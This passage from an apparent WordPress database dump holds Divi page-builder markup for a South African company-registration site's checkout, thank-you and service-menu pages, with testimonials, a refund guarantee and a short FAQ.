Guaranteed Weight Gain\" _builder_version=\"3.26.3\" header_font=\"Poppins|500|||||||\" header_text_color=\"rgba(255,255,255,0.73)\" header_font_size=\"16px\" background_layout=\"dark\" custom_margin=\"||10px|\" custom_padding=\"0px|||60px|false|false\" _i=\"2\" _address=\"0.0.2.2\"][/et_pb_blurb][et_pb_blurb title=\"Professional consultants ready to assist\" use_icon=\"on\" font_icon=\"%%59%%\" icon_color=\"#dafa02\" icon_placement=\"left\" content_max_width=\"1100px\" use_icon_font_size=\"on\" icon_font_size=\"15px\" admin_label=\"Text: Best Results For Regular Consumption\" _builder_version=\"3.26.3\" header_font=\"Poppins|500|||||||\" header_text_color=\"rgba(255,255,255,0.73)\" header_font_size=\"16px\" background_layout=\"dark\" custom_margin=\"||10px|\" custom_padding=\"0px|||60px|false|false\" _i=\"3\" _address=\"0.0.2.3\"][/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"3.22\" fb_built=\"1\" _i=\"1\" _address=\"1\"][et_pb_row column_structure=\"3_5,2_5\" use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" custom_padding_last_edited=\"on|phone\" padding_top_bottom_link_2=\"true\" padding_left_right_link_1=\"true\" padding_left_right_link_2=\"true\" _builder_version=\"3.26.3\" border_radii=\"on|20px|20px|20px|20px\" border_width_all=\"1px\" border_color_all=\"rgba(255,255,255,0)\" box_shadow_style=\"preset1\" box_shadow_horizontal=\"-13px\" box_shadow_vertical=\"-11px\" box_shadow_blur=\"16px\" custom_margin=\"-174px||||false|false\" custom_padding=\"0px||120px||false|false\" custom_padding_tablet=\"||50px\" custom_padding_phone=\"||30px\" _i=\"0\" _address=\"1.0\"][et_pb_column type=\"3_5\" _builder_version=\"3.25\" background_color=\"#f9f9f9\" custom_padding=\"30px|40px|50px|40px\" custom_padding_tablet=\"|30px|30px|30px\" custom_padding_phone=\"20px|20px|20px|20px\" custom_padding_last_edited=\"on|desktop\" custom_padding__hover=\"|||\" _i=\"0\" _address=\"1.0.0\"][et_pb_code admin_label=\"Checkout  Shortcode\" _builder_version=\"3.19.11\" _i=\"0\" _address=\"1.0.0.0\"][cartflows_checkout][/et_pb_code][/et_pb_column][et_pb_column type=\"2_5\" _builder_version=\"3.25\" background_color=\"#edeef2\" custom_padding=\"40px|40px|40px|40px\" custom_padding_tablet=\"30px|30px|30px|30px\" custom_padding_phone=\"20px|20px|20px|20px\" custom_padding_last_edited=\"on|phone\" custom_padding__hover=\"|||\" _i=\"1\" _address=\"1.0.1\"][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/07/satisfaction-guarantee-2109235_1280.png\" align=\"center\" align_tablet=\"center\" align_last_edited=\"on|desktop\" admin_label=\"Money Back Image\" _builder_version=\"3.26.3\" max_width=\"30%\" module_alignment=\"left\" custom_margin=\"||20px|0px|false|false\" custom_padding=\"|||0px|false|false\" filter_hue_rotate=\"14deg\" filter_saturate=\"200%\" filter_brightness=\"107%\" filter_contrast=\"81%\" _i=\"0\" _address=\"1.0.1.0\"][/et_pb_image][et_pb_text admin_label=\"Headline and Text: 30 Days Full Refund Policy.\" _builder_version=\"3.26.3\" text_font=\"Poppins||||||||\" header_font=\"Poppins||||||||\" header_3_font=\"Poppins|500|||||||\" header_3_text_color=\"#242f6b\" header_3_font_size=\"18px\" header_3_line_height=\"1.4em\" custom_margin=\"||9px\" _i=\"1\" _address=\"1.0.1.1\"]<h3>100% Money Back. No-Risk.</h3>\r\n<h3>Full Refund Policy.</h3>\r\nNo Risk guarantee, if you not happy at any time, prior to registration of your company, we will refund you 100%, no questions asked.[/et_pb_text][et_pb_divider color=\"#000000\" divider_style=\"dashed\" divider_position=\"center\" _builder_version=\"3.19.7\" height=\"46px\" _i=\"2\" _address=\"1.0.1.2\"][/et_pb_divider][et_pb_text admin_label=\"Headline: Success Stories\" _builder_version=\"3.19.11\" text_font=\"Roboto||||||||\" header_font=\"||||||||\" header_3_font=\"Roboto|500|||||||\" header_3_text_color=\"#242f6b\" header_3_font_size=\"18px\" header_3_line_height=\"1.4em\" custom_margin=\"||9px\" _i=\"3\" _address=\"1.0.1.3\"]<h3>Success Stories</h3>[/et_pb_text][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/07/5stars-free-img.png\" align=\"center\" align_tablet=\"center\" align_last_edited=\"on|desktop\" admin_label=\"Star Image\" _builder_version=\"3.23\" max_width=\"20%\" module_alignment=\"left\" custom_margin=\"20px||10px||false|false\" filter_hue_rotate=\"22deg\" filter_saturate=\"200%\" filter_brightness=\"85%\" filter_contrast=\"172%\" _i=\"4\" _address=\"1.0.1.4\"][/et_pb_image][et_pb_text admin_label=\"Testimonial Text\" _builder_version=\"3.26.3\" text_font=\"Poppins||||||||\" text_text_color=\"#000000\" text_font_size=\"13px\" header_font=\"||||||||\" header_3_font=\"Roboto|500|||||||\" header_3_text_color=\"#242f6b\" header_3_font_size=\"18px\" header_3_line_height=\"1.4em\" custom_margin=\"||20px\" _i=\"5\" _address=\"1.0.1.5\"]<p>\"They have impressed me with their knowledge and efficiency. The professionals have always been very helpful to myself and my clients.”</p>[/et_pb_text][et_pb_blurb title=\"Gretchen Rose Matthews \" icon_placement=\"left\" admin_label=\"Testimonial: Image and Name\" module_class=\"testimonial-blurb\" _builder_version=\"3.26.3\" header_font=\"Roboto|700|||||||\" header_font_size=\"12px\" body_font=\"Roboto|100|||||||\" body_text_color=\"#636363\" body_font_size=\"12px\" body_line_height=\"1.3em\" custom_margin=\"-15px||||false|false\" _i=\"6\" _address=\"1.0.1.6\"]<p>Senior Consultant, Constructive Consulting Group (Pty) Ltd</p>[/et_pb_blurb][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/07/5stars-free-img.png\" align=\"center\" align_tablet=\"center\" align_last_edited=\"on|desktop\" admin_label=\"Star Image\" _builder_version=\"3.26.3\" max_width=\"20%\" module_alignment=\"left\" custom_margin=\"20px||10px||false|false\" filter_hue_rotate=\"22deg\" filter_saturate=\"200%\" filter_brightness=\"85%\" filter_contrast=\"172%\" _i=\"7\" _address=\"1.0.1.7\"][/et_pb_image][et_pb_text admin_label=\"Testimonial Text\" _builder_version=\"3.26.3\" text_font=\"Poppins||||||||\" text_text_color=\"#000000\" text_font_size=\"13px\" header_font=\"||||||||\" header_3_font=\"Roboto|500|||||||\" header_3_text_color=\"#242f6b\" header_3_font_size=\"18px\" header_3_line_height=\"1.4em\" custom_margin=\"||20px\" _i=\"8\" _address=\"1.0.1.8\"]<p>“companyregistration.online is one of the most dynamic, modest, modern, up to date and well informed service providers we have ever used”</p>[/et_pb_text][et_pb_blurb title=\"Silas Gidzha \" icon_placement=\"left\" admin_label=\"Testimonial: Image and Name\" module_class=\"testimonial-blurb\" _builder_version=\"3.26.3\" header_font=\"Roboto|700|||||||\" header_font_size=\"12px\" body_font=\"Roboto|100|||||||\" body_text_color=\"#636363\" body_font_size=\"12px\" body_line_height=\"1.3em\" custom_margin=\"-15px||||false|false\" _i=\"9\" _address=\"1.0.1.9\"]<p>CEO, S&amp;S Orthopedic Services (Pty)Ltd</p>[/et_pb_blurb][et_pb_divider color=\"#000000\" divider_style=\"dashed\" divider_position=\"center\" _builder_version=\"3.19.7\" height=\"46px\" custom_margin=\"||20px\" _i=\"10\" _address=\"1.0.1.10\"][/et_pb_divider][et_pb_text _builder_version=\"3.26.3\" custom_margin=\"-50px||||false|false\" _i=\"11\" _address=\"1.0.1.11\"]<p>[hurrytimer id=\"31525\"]</p>[/et_pb_text][et_pb_divider color=\"#000000\" divider_style=\"dashed\" divider_position=\"center\" _builder_version=\"3.26.3\" height=\"46px\" custom_margin=\"-14px||20px||false|false\" _i=\"12\" _address=\"1.0.1.12\"][/et_pb_divider][et_pb_text admin_label=\"Headline: Frequent Queries\" _builder_version=\"3.19.11\" text_font=\"Roboto||||||||\" header_font=\"||||||||\" header_3_font=\"Roboto|500|||||||\" header_3_text_color=\"#242f6b\" header_3_font_size=\"18px\" header_3_line_height=\"1.4em\" custom_margin=\"||9px\" _i=\"13\" _address=\"1.0.1.13\"]<h3>Frequent Queries</h3>[/et_pb_text][et_pb_accordion open_toggle_text_color=\"#242f6b\" open_toggle_background_color=\"#ffffff\" closed_toggle_text_color=\"rgba(36,47,107,0.8)\" closed_toggle_background_color=\"#ffffff\" admin_label=\"Accordion: FAQ\" _builder_version=\"3.26.3\" toggle_font=\"Roboto|500|||||||\" body_font=\"Roboto||||||||\" body_text_color=\"#000000\" border_color_all=\"#f2f2f2\" _i=\"14\" _address=\"1.0.1.14\"][et_pb_accordion_item title=\"Where are your offices located?\" open=\"on\" icon_color=\"#242f6b\" _builder_version=\"3.26.3\" _i=\"0\" _address=\"1.0.1.14.0\"]<p>101 Rose Avenue, Lenasia, Johannesburg, 1827. Call 010 592 7717</p>[/et_pb_accordion_item][et_pb_accordion_item title=\"What do I need to register my company ?\" icon_color=\"#242f6b\" _builder_version=\"3.26.3\" _i=\"1\" _address=\"1.0.1.14.1\" open=\"off\"]<p>Once the order is made an email will be sent containg all the all the requirements</p>[/et_pb_accordion_item][et_pb_accordion_item title=\"How long does it take to register?\" icon_color=\"#242f6b\" _builder_version=\"3.26.3\" _i=\"2\" _address=\"1.0.1.14.2\" open=\"off\"]<p>Typically it takes between 3-5days, CIPC delays may extend the duration</p>[/et_pb_accordion_item][/et_pb_accordion][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"3.26.3\" fb_built=\"1\" _i=\"2\" _address=\"2\"][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"3.26.3\" custom_margin=\"-43px||||false|false\" _i=\"0\" _address=\"2.0\"][et_pb_column type=\"1_2\" _builder_version=\"3.26.3\" _i=\"0\" _address=\"2.0.0\"][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/06/companyregistration-web-e1563787290497.png\" _builder_version=\"3.26.3\" width=\"54%\" max_width=\"54%\" _i=\"0\" _address=\"2.0.0.0\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.26.3\" _i=\"1\" _address=\"2.0.1\"][et_pb_text _builder_version=\"3.26.3\" _i=\"0\" _address=\"2.0.1.0\"]<p style=\"text-align: right;\">@2018</p>\r\n<p style=\"text-align: right;\">Powered By: Digital Power Solutions (Pty)Ltd</p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','SA Company Registration Checkout','','publish','closed','closed','','sa-company-registration-3','','','2019-08-26 16:52:48','2019-08-26 14:52:48','',0,'https://companyregistration.online/sa-company-registration-3/',0,'cartflows_step','',0),(33136,1,'2019-08-22 16:06:19','2019-08-22 14:06:19','[et_pb_section fb_built=\"1\" custom_padding_last_edited=\"on|phone\" _builder_version=\"3.26.3\" background_color=\"#faf9ff\" custom_margin=\"-230px||||false|false\" custom_padding=\"25px||140px\" custom_padding_tablet=\"50px||50px\" custom_padding_phone=\"30px||30px\"][et_pb_row custom_padding=\"0px||0px||true\" custom_margin=\"0px||0px||true\" _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_code admin_label=\"Note: Important Styling (Don\'t Remove or you can do CSS customization here)\" _builder_version=\"3.19.9\" custom_margin=\"0px||0px||true\" custom_padding=\"0px||0px||true\"]<style><!-- [et_pb_line_break_holder] -->body {<!-- [et_pb_line_break_holder] -->	font-weight: 400;<!-- [et_pb_line_break_holder] -->}<!-- [et_pb_line_break_holder] -->.et_fixed_nav.et_show_nav #page-container, .et_non_fixed_nav.et_transparent_nav.et_show_nav #page-container {<!-- [et_pb_line_break_holder] -->    padding-top: 0;<!-- [et_pb_line_break_holder] -->}<!-- [et_pb_line_break_holder] -->.vertical-align-middle {<!-- [et_pb_line_break_holder] -->	align-items:center;<!-- [et_pb_line_break_holder] -->	align-self:center;<!-- [et_pb_line_break_holder] -->}<!-- [et_pb_line_break_holder] --></style>[/et_pb_code][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Thank You \" use_icon=\"on\" font_icon=\"%%202%%\" icon_color=\"#61ce70\" content_max_width=\"648px\" admin_label=\"Headline: Thank you\" _builder_version=\"3.26.3\" header_font=\"Poppins||||||||\" header_text_color=\"#e03d52\" header_font_size=\"50px\" body_font=\"Poppins||||||||\" body_text_color=\"rgba(0,0,0,0.55)\" body_font_size=\"20px\" text_orientation=\"center\" header_font_size_tablet=\"24px\" header_font_size_last_edited=\"on|phone\"]<p><strong>Congratulations</strong>, you have taken a bold step.</p>\r\n<p>It\'s being proven time and time again that the best returns on any investment comes from a well run business.</p>\r\n<p><strong>Check your email for the details on what to do next</strong></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"2_3,1_3\" _builder_version=\"3.25\"][et_pb_column type=\"2_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Confirmation on what you will receive\" content_max_width=\"648px\" admin_label=\"Headline: Thank you\" _builder_version=\"3.26.3\" header_font=\"Poppins|600|||||||\" header_text_color=\"#e03d52\" header_font_size=\"20px\" body_font=\"Poppins||||||||\" body_text_color=\"rgba(0,0,0,0.55)\" body_ul_font=\"||||||||\" body_ul_line_height=\"1.7em\" header_font_size_tablet=\"24px\" header_font_size_last_edited=\"on|phone\"]<ul>\r\n<li>- Name reservation based on <span data-dobid=\"hdw\">dissimilar</span> names</li>\r\n<li>- Registered company</li>\r\n<li>- Tax Clearance, if required</li>\r\n</ul>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/06/companyregistration-web.png\" _builder_version=\"3.26.3\" custom_padding=\"25px||||false|false\"][/et_pb_image][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"3.26.3\"][et_pb_column type=\"4_4\" _builder_version=\"3.26.3\"][et_pb_text _builder_version=\"3.26.3\" text_font=\"Poppins||||||||\" custom_margin=\"-25px||-33px||false|false\"]<p style=\"text-align: center;\"><em><strong>Our office number is 010 592 7717 should you have any questions, ask for a registration consultant</strong></em></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"3.22\" background_color=\"#ffffff\" custom_padding=\"2px||50px\"][et_pb_row custom_padding=\"50px|20px|50px|20px|true|true\" custom_margin=\"-90px||\" _builder_version=\"3.25\" background_color=\"#ffffff\" border_radii=\"on|3px|3px|3px|3px\" box_shadow_style=\"preset1\" box_shadow_vertical=\"0px\" box_shadow_blur=\"20px\" box_shadow_color=\"rgba(0,0,0,0.1)\" max_width=\"880px\" custom_margin_tablet=\"-60px||\" custom_margin_phone=\"-30px||\" custom_margin_last_edited=\"on|phone\" use_custom_width=\"on\" custom_width_px=\"880px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_code admin_label=\"Order Details Shortcode\" _builder_version=\"3.19.11\"][cartflows_order_details][/et_pb_code][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"3_5,2_5\" custom_padding=\"35px|20px|35px|20px|true|true\" custom_margin=\"30px||\" _builder_version=\"3.25\" border_radii=\"on|3px|3px|3px|3px\" max_width=\"880px\" use_custom_width=\"on\" custom_width_px=\"880px\"][et_pb_column type=\"3_5\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text disabled_on=\"on|on|off\" admin_label=\"Headline: Join Our Community\" _builder_version=\"3.19.11\" text_font=\"Poppins||||||||\" text_text_color=\"#7a7a7a\" header_font=\"||||||||\" header_2_font=\"Poppins|700|||||||\" header_2_text_align=\"left\" header_2_text_color=\"#54595f\" header_2_font_size=\"22px\" module_alignment=\"right\" header_2_font_size_tablet=\"22px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|tablet\"]<h2>Join Our Community</h2>\r\nClick edit button to change this text. Lorem ipsum dolor sit amet,[/et_pb_text][/et_pb_column][et_pb_column type=\"2_5\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_social_media_follow _builder_version=\"3.19.9\" text_orientation=\"center\"][et_pb_social_media_follow_network social_network=\"facebook\" _builder_version=\"3.19.9\" background_color=\"#3b5998\" border_radii=\"on|5px|5px|5px|5px\" custom_padding=\"5px|5px|5px|5px|true|true\" follow_button=\"off\" url_new_window=\"on\"]facebook[/et_pb_social_media_follow_network][et_pb_social_media_follow_network social_network=\"twitter\" _builder_version=\"3.19.9\" background_color=\"#00aced\" border_radii=\"on|5px|5px|5px|5px\" custom_padding=\"5px|5px|5px|5px|true|true\" follow_button=\"off\" url_new_window=\"on\"]twitter[/et_pb_social_media_follow_network][et_pb_social_media_follow_network social_network=\"google-plus\" _builder_version=\"3.19.9\" background_color=\"#dd4b39\" border_radii=\"on|5px|5px|5px|5px\" custom_padding=\"5px|5px|5px|5px|true|true\" follow_button=\"off\" url_new_window=\"on\"]google-plus[/et_pb_social_media_follow_network][/et_pb_social_media_follow][/et_pb_column][/et_pb_row][/et_pb_section]','Thank You CoReg','','publish','closed','closed','','thank-you-coreg-3','','','2019-08-22 16:06:19','2019-08-22 14:06:19','',0,'https://companyregistration.online/thank-you-coreg-3/',0,'cartflows_step','',0),(33141,3,'2019-08-22 16:17:11','2019-08-22 14:17:11','[et_pb_section fb_built=\"1\" _builder_version=\"3.26.6\" fb_built=\"1\" _i=\"0\" _address=\"0\"][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"3.26.6\" _i=\"0\" _address=\"0.0\"][et_pb_column type=\"1_2\" _builder_version=\"3.26.6\" _i=\"0\" _address=\"0.0.0\"][et_pb_divider show_divider=\"off\" _builder_version=\"3.26.6\" height=\"125px\" _i=\"0\" _address=\"0.0.0.0\"][/et_pb_divider][et_pb_text _builder_version=\"3.26.6\" text_font=\"|700|||||||\" header_font=\"|700|||||||\" header_text_align=\"center\" header_font_size=\"47px\" _i=\"1\" _address=\"0.0.0.1\"]<h1 style=\"text-align: center;\">What Would You Like To Do ?</h1>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.26.6\" _i=\"1\" _address=\"0.0.1\"][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/07/working-free-img.jpg\" _builder_version=\"3.27.3\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"3%\" animation_speed_curve=\"ease-in\" _i=\"0\" _address=\"0.0.1.0\"][/et_pb_image][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" _builder_version=\"3.26.6\" width=\"98%\" max_width=\"1347px\" module_alignment=\"center\" custom_margin=\"-26px|223px||427px||\" _i=\"1\" _address=\"0.1\"][et_pb_column type=\"1_4\" _builder_version=\"3.26.6\" _i=\"0\" _address=\"0.1.0\"][et_pb_cta title=\"Register A Company\" button_url=\"https://companyregistration.online/company-registrations/\" button_text=\"Start here\" admin_label=\"owner managed\" _builder_version=\"3.27.3\" header_font=\"Encode Sans Condensed|700|||||||\" header_text_color=\"#0c71c3\" header_letter_spacing=\"2px\" background_enable_color=\"off\" background_color_gradient_direction=\"177deg\" background_blend=\"overlay\" border_radii=\"on|10px|10px|10px|10px\" border_width_all=\"0px\" border_color_all=\"#ffffff\" border_style_all=\"solid\" custom_button=\"on\" button_text_size=\"15px\" button_border_width=\"0px\" background_layout=\"light\" custom_margin=\"0px||||false|false\" custom_padding=\"20px|5px|10px|5px|false|false\" animation_style=\"flip\" animation_delay=\"400ms\" link_option_url=\"https://companyregistration.online/company-registrations/\" hover_enabled=\"0\" custom_css_main_element=\"box-shadow: 0px 0px 20px #bfb7b6;\" use_border_color=\"on\" border_width=\"0px\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on|hover\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on|hover\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\" background__hover_enabled=\"on\" background_color__hover=\"rgba(196,13,126,0.64)\" background_enable_color__hover=\"on\" header_text_color__hover_enabled=\"on\" header_text_color__hover=\"#ffffff\" _i=\"0\" _address=\"0.1.0.0\" button_bg_color__hover=\"#0c71c3\" button_bg_enable_color__hover=\"on\" button_text_color__hover=\"#ffffff\"][/et_pb_cta][et_pb_button button_text=\"Click Here\" _builder_version=\"3.27.3\" button_alignment=\"center\" hover_enabled=\"0\" button_url=\"https://companyregistration.online/company-registrations/\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.26.6\" _i=\"1\" _address=\"0.1.1\"][et_pb_cta title=\"Maintain My Company\" button_url=\"https://companyregistration.online/maintaining-your-company/\" button_text=\"Start here\" admin_label=\"owner managed\" _builder_version=\"3.27.3\" header_font=\"Encode Sans Condensed|700|||||||\" header_text_color=\"#0c71c3\" header_letter_spacing=\"2px\" background_enable_color=\"off\" background_color_gradient_direction=\"177deg\" background_blend=\"overlay\" border_radii=\"on|10px|10px|10px|10px\" border_width_all=\"0px\" border_color_all=\"#ffffff\" border_style_all=\"solid\" custom_button=\"on\" button_text_size=\"15px\" button_border_width=\"0px\" background_layout=\"light\" custom_margin=\"0px||||false|false\" custom_padding=\"20px|5px|10px|5px|false|false\" animation_style=\"flip\" animation_delay=\"400ms\" link_option_url=\"https://companyregistration.online/maintaining-your-company/\" hover_enabled=\"0\" custom_css_main_element=\"box-shadow: 0px 0px 20px #bfb7b6;\" use_border_color=\"on\" border_width=\"0px\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\" header_text_color__hover=\"#ffffff\" header_text_color__hover_enabled=\"on\" background_enable_color__hover=\"on\" _i=\"0\" _address=\"0.1.1.0\" background_color__hover=\"rgba(196,13,126,0.64)\" background__hover_enabled=\"on\"][/et_pb_cta][et_pb_button button_text=\"Click Here\" _builder_version=\"3.27.3\" button_url=\"https://companyregistration.online/maintaining-your-company/\" button_alignment=\"center\" hover_enabled=\"0\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.26.6\" _i=\"2\" _address=\"0.1.2\"][et_pb_cta title=\"Register For Tax\" button_url=\"https://companyregistration.online/tax-registrations\" button_text=\"Start here\" admin_label=\"owner managed\" _builder_version=\"3.27.3\" header_font=\"Encode Sans Condensed|700|||||||\" header_text_color=\"#0c71c3\" header_letter_spacing=\"2px\" background_enable_color=\"off\" background_color_gradient_direction=\"177deg\" background_blend=\"overlay\" border_radii=\"on|10px|10px|10px|10px\" border_width_all=\"0px\" border_color_all=\"#ffffff\" border_style_all=\"solid\" custom_button=\"on\" button_text_size=\"15px\" button_border_width=\"0px\" background_layout=\"light\" custom_margin=\"0px||||false|false\" custom_padding=\"20px|5px|10px|5px|false|false\" animation_style=\"flip\" animation_delay=\"400ms\" link_option_url=\"https://companyregistration.online/tax-registrations\" hover_enabled=\"0\" custom_css_main_element=\"box-shadow: 0px 0px 20px #bfb7b6;\" use_border_color=\"on\" border_width=\"0px\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\" header_text_color__hover=\"#ffffff\" header_text_color__hover_enabled=\"on\" background_enable_color__hover=\"on\" _i=\"0\" _address=\"0.1.2.0\" background_color__hover=\"rgba(196,13,126,0.64)\" background__hover_enabled=\"on\"][/et_pb_cta][et_pb_button button_text=\"Click Here\" _builder_version=\"3.27.3\" button_url=\"https://companyregistration.online/tax-registrations\" hover_enabled=\"0\" button_alignment=\"center\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.26.6\" _i=\"3\" _address=\"0.1.3\"][et_pb_cta title=\"Combo Deals\" button_url=\"https://companyregistration.online/combo-deals-2\" button_text=\"Start here\" admin_label=\"owner managed\" _builder_version=\"3.27.3\" header_font=\"Encode Sans Condensed|700|||||||\" header_text_color=\"#0c71c3\" header_letter_spacing=\"2px\" background_enable_color=\"off\" background_color_gradient_direction=\"177deg\" background_blend=\"overlay\" border_radii=\"on|10px|10px|10px|10px\" border_width_all=\"0px\" border_color_all=\"#ffffff\" border_style_all=\"solid\" custom_button=\"on\" button_text_size=\"15px\" button_border_width=\"0px\" background_layout=\"light\" custom_margin=\"0px||||false|false\" custom_padding=\"20px|5px|10px|5px|false|false\" animation_style=\"flip\" animation_delay=\"400ms\" link_option_url=\"https://companyregistration.online/combo-deals-2\" hover_enabled=\"0\" custom_css_main_element=\"box-shadow: 0px 0px 20px #bfb7b6;\" use_border_color=\"on\" border_width=\"0px\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\" header_text_color__hover=\"#ffffff\" header_text_color__hover_enabled=\"on\" background_enable_color__hover=\"on\" _i=\"0\" _address=\"0.1.3.0\" background_color__hover=\"rgba(196,13,126,0.64)\" background__hover_enabled=\"on\"][/et_pb_cta][et_pb_button button_text=\"Click Here\" _builder_version=\"3.27.3\" button_url=\"https://companyregistration.online/combo-deals-2\" button_alignment=\"center\" hover_enabled=\"0\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" custom_padding_last_edited=\"on|tablet\" admin_label=\"Call to Action\" _builder_version=\"3.26.6\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"#edf8ff\" width=\"93%\" module_alignment=\"center\" custom_padding=\"||\" custom_padding_tablet=\"|0vw|30vw|\" bottom_divider_color=\"#ffffff\" bottom_divider_height=\"24vw\" bottom_divider_repeat=\"0.6x\" bottom_divider_flip=\"vertical|horizontal\" bottom_divider_arrangement=\"above_content\" locked=\"off\" fb_built=\"1\" _i=\"1\" _address=\"1\"][et_pb_row column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" gutter_width=\"2\" _builder_version=\"3.25\" width=\"100%\" max_width=\"100%\" use_custom_width=\"on\" width_unit=\"off\" custom_width_percent=\"100%\" _i=\"0\" _address=\"1.0\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\" _i=\"0\" _address=\"1.0.0\"][et_pb_text _builder_version=\"3.26.6\" text_font=\"Encode Sans Semi Condensed||||||||\" text_font_size=\"21px\" text_line_height=\"2em\" header_font=\"Poppins|600|||||||\" header_font_size=\"40px\" header_line_height=\"1.3em\" header_2_font=\"Encode Sans Semi Condensed|600|||||||\" header_2_text_align=\"center\" header_2_font_size=\"32px\" header_2_line_height=\"1.6em\" max_width=\"700px\" header_2_font_size_tablet=\"24px\" header_2_font_size_phone=\"18px\" 